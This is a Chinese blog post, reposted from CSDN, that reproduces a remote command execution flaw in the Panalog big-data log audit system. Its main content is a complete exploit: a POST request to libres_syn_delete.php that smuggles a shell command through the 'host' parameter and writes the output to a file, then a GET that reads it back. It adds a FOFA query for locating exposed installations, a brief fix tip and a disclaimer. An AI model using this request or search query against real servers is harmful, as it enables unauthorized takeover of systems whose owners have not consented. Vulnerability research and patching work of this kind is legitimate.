0


【复现】Panalog大数据日志审计系统 RCE漏洞_51

一.概述

Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。

二 .漏洞影响

    通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。继承Web服务器程序的权限,去执行系统命令,控制整个服务器。

三.漏洞复现

1. 漏洞一:

(1)漏洞类型: RCE

(2)请求类型:POST

(3)复现

找到相关系统


请求漏洞点,查看yakit响应

成功执行命令后访问/content-apply/111.txt


yakit请求包

POST /content-apply/libres_syn_delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

token=1&id=2&host=|id >111.txt
GET /content-apply/111.txt

四.修复建议:

命令执行函数的变量在进入执行命令函数前要做好过滤和检测。

五. 搜索语法:

1.fofa

app="Panabit-Panalog"

六.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。


本文转载自: https://blog.csdn.net/fushuang333/article/details/136156979
版权归原作者 穿着白衣 所有, 如有侵权,请联系我们删除。

“【复现】Panalog大数据日志审计系统 RCE漏洞_51”的评论:

还没有评论